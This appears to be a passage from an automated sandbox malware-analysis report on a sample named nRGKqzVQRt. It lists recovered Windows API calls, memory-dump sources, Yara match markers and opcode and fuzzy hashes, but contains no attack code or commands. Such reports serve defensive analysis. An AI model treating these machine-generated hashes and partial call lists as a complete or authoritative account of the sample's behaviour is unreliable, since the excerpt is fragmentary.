                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00677C8A,?,?,?,00000055,?,-00000050,?,?), ref: 006811E6
                                                  • _wcschr.LIBVCRUNTIME ref: 0068127A
                                                  • _wcschr.LIBVCRUNTIME ref: 00681288
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00681349
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                  • String ID:
                                                  • API String ID: 4147378913-0
                                                  • Opcode ID: 2a6404712282db71a29471be0cd7d31724836b51377f739b85fde7269eafe9cd
                                                  • Instruction ID: 498d25432a92c126333c42773a48ebbf21089e6d1ab5fe775c0a508fbafbcc0d
                                                  • Opcode Fuzzy Hash: 2a6404712282db71a29471be0cd7d31724836b51377f739b85fde7269eafe9cd
                                                  • Instruction Fuzzy Hash: 11712B31600206ABEB64BB74CC56FBA73AEEF46700F14463DF545DF281EA70DA828764
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                    • Part of subcall function 00418E23: _free.LIBCMT ref: 00418E85
                                                    • Part of subcall function 00418E23: _free.LIBCMT ref: 00418EBB
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00421900
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00421949
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00421958
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004219A0
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004219BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 949163717-0
                                                  • Opcode ID: 58ecbf3c41238f0300b8562ce6723dacb10c2e4b0d6c54bc6f80534ba04a49f5
                                                  • Instruction ID: 516db4477a6e51dbe21ee2870d246937693e17751cc1d143beebadadd3fc4239
                                                  • Opcode Fuzzy Hash: 58ecbf3c41238f0300b8562ce6723dacb10c2e4b0d6c54bc6f80534ba04a49f5
                                                  • Instruction Fuzzy Hash: BC51A971B00229ABEF20EFA5DC81ABF73B8BF54704F94446AF500E7260D7749945C769
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                    • Part of subcall function 0067908A: _free.LIBCMT ref: 006790EC
                                                    • Part of subcall function 0067908A: _free.LIBCMT ref: 00679122
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00681B67
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00681BB0
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00681BBF
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00681C07
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00681C26
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 949163717-0
                                                  • Opcode ID: 8a115925ad46f73fe3f85c246f00a00863f26e6dfe943abe63c1a752b08689ff
                                                  • Instruction ID: 306ee874636052a450b3beb79831be078f9b91095b9bc87f5685e197ffcc05ad
                                                  • Opcode Fuzzy Hash: 8a115925ad46f73fe3f85c246f00a00863f26e6dfe943abe63c1a752b08689ff
                                                  • Instruction Fuzzy Hash: 8F518471A00209AFDB20EFA5CC81EFE73BEEF06700F144669E514EB250E77099428B65
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .AB$.AB
                                                  • API String ID: 0-2297053732
                                                  • Opcode ID: 34d1119f2ae738b9659adfb13489a30e3bb955bef0d933f4a1bcf5af706cb53a
                                                  • Instruction ID: 9c6ffa21bb75b4405fc2a4b8468ed771a2dab9a861c59683d1b669e683ffb55f
                                                  • Opcode Fuzzy Hash: 34d1119f2ae738b9659adfb13489a30e3bb955bef0d933f4a1bcf5af706cb53a
                                                  • Instruction Fuzzy Hash: DAF13D71E00619DFDF14CFA9D9806EEB7B1FF88314F15826AD819AB344E734A941CB94
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040D7C1
                                                  • IsDebuggerPresent.KERNEL32 ref: 0040D88D
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D8AD
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0040D8B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                                  • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0066DA28
                                                  • IsDebuggerPresent.KERNEL32 ref: 0066DAF4
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0066DB14
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0066DB1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                    • Part of subcall function 00418E23: _free.LIBCMT ref: 00418E85
                                                    • Part of subcall function 00418E23: _free.LIBCMT ref: 00418EBB
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004212FA
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00421344
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042140A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale$ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 3140898709-0
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                    • Part of subcall function 0067908A: _free.LIBCMT ref: 006790EC
                                                    • Part of subcall function 0067908A: _free.LIBCMT ref: 00679122
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00681561
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006815AB
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00681671
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale$ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 3140898709-0
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00411273
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0041127D
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0041128A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 006714DA
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 006714E4
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 006714F1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                  • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                  • ExitProcess.KERNEL32 ref: 10005F60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,00674EF5,00000000,004280A0,?,00000000,?,0067933A), ref: 00674F18
                                                  • TerminateProcess.KERNEL32(00000000,?,00674EF5,00000000,004280A0,?,00000000,?,0067933A), ref: 00674F1F
                                                  • ExitProcess.KERNEL32 ref: 00674F31
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$GetProcAddress.$l
                                                  • API String ID: 0-2784972518
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041C27E,?,?,00000008,?,?,004251AB,00000000), ref: 0041C4B0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,0067C4E5,?,?,?,?,?,?,00000000), ref: 0067C717
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040D9C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                  • Instruction ID: 335cc09878d9dc9b483997cee4c12024a5fb43c2c5be13206e8e105b8fe94413
                                                  • Opcode Fuzzy Hash: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                  • Instruction Fuzzy Hash: 1B41B475C0425DAFEB10DF69CC89AEABBB9FF45240F1442D9E44DD3205DA359E848F10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b49e464df8cd9887f9f5fc85569800c21fe91771b7d4add5f8fbefd4ba984765
                                                  • Instruction ID: 5aab37c4b103b9fd90ad100f31a5bc04b07e884212a001980044405564e9c6c0
                                                  • Opcode Fuzzy Hash: b49e464df8cd9887f9f5fc85569800c21fe91771b7d4add5f8fbefd4ba984765
                                                  • Instruction Fuzzy Hash: 5741C6B5C04218AEDB24DF79CC89AEABBB9EF49310F1482DDE41DD3211DA359E848F14
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                    • Part of subcall function 00418E23: _free.LIBCMT ref: 00418E85
                                                    • Part of subcall function 00418E23: _free.LIBCMT ref: 00418EBB
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042154D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free$InfoLocale
                                                  • String ID:
                                                  • API String ID: 2003897158-0
                                                  • Opcode ID: 3034b70ca8a59bcd1a54a412746b10e778b5baf9d18adb7accf15c2e8f28c0ec
                                                  • Instruction ID: 0a4d2d06c034290d104409f0a8c1658b3f82e5bad43bf4f1fbb2ccba27987c0f
                                                  • Opcode Fuzzy Hash: 3034b70ca8a59bcd1a54a412746b10e778b5baf9d18adb7accf15c2e8f28c0ec
                                                  • Instruction Fuzzy Hash: 1421B671714216BBDF289B15EC81EBB33A8EF94314B5001BFF902D6251EB399E818A58
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                    • Part of subcall function 0067908A: _free.LIBCMT ref: 006790EC
                                                    • Part of subcall function 0067908A: _free.LIBCMT ref: 00679122
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006817B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_free$InfoLocale
                                                  • String ID:
                                                  • API String ID: 2003897158-0
                                                  • Opcode ID: c057830d9f955838873051aea3cb367ccca586cb99bd1b8caf0ec7dac73f1eb9
                                                  • Instruction ID: 135c066c9e5d9f4625854ccaea876e3e854e3f463121f0a490ad26c0b0db9b49
                                                  • Opcode Fuzzy Hash: c057830d9f955838873051aea3cb367ccca586cb99bd1b8caf0ec7dac73f1eb9
                                                  • Instruction Fuzzy Hash: 9A21C572610106ABDB28AF25DC42EFA73ADEF46310B14417EFD16CA241EB35ED468B54
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  • EnumSystemLocalesW.KERNEL32(004212A6,00000001,00000000,?,-00000050,?,004218D4,00000000,?,?,?,00000055,?), ref: 004211F2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                  • Instruction ID: 1a156f0733b9bda999ead150ec1823f2d34610307ed71135a7bf92de471f7001
                                                  • Opcode Fuzzy Hash: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                  • Instruction Fuzzy Hash: 951129363003019FDB189F79D8916BABB91FF94318B58442EE64687750E7756943C744
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  • EnumSystemLocalesW.KERNEL32(004212A6,00000001,00000000,?,-00000050,?,00681B3B,00000000,?,?,?,00000055,?), ref: 00681459
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                  • Instruction ID: 4a8d83728343ede6d27c0a1253cbcb5f62d0d20597fc7629dcf414cfce36d6ac
                                                  • Opcode Fuzzy Hash: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                  • Instruction Fuzzy Hash: 771129362007019FDB18AF39C8915BAB7D6FF84758B14852DE9878BB40D771B943C740
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004214C2,00000000,00000000,?), ref: 00421751
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  • Opcode ID: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                  • Instruction ID: 555e0e489eff99157af98c992298e2a68b21b4fc6b2928ebd806db451c2e11da
                                                  • Opcode Fuzzy Hash: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                  • Instruction Fuzzy Hash: 38F04932700121BBDB245B20DC05BBB37A8EBC0314F45042AEC02A3290DA38FD42D694
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00681729,00000000,00000000,?), ref: 006819B8
                                                  Memory Dump Source
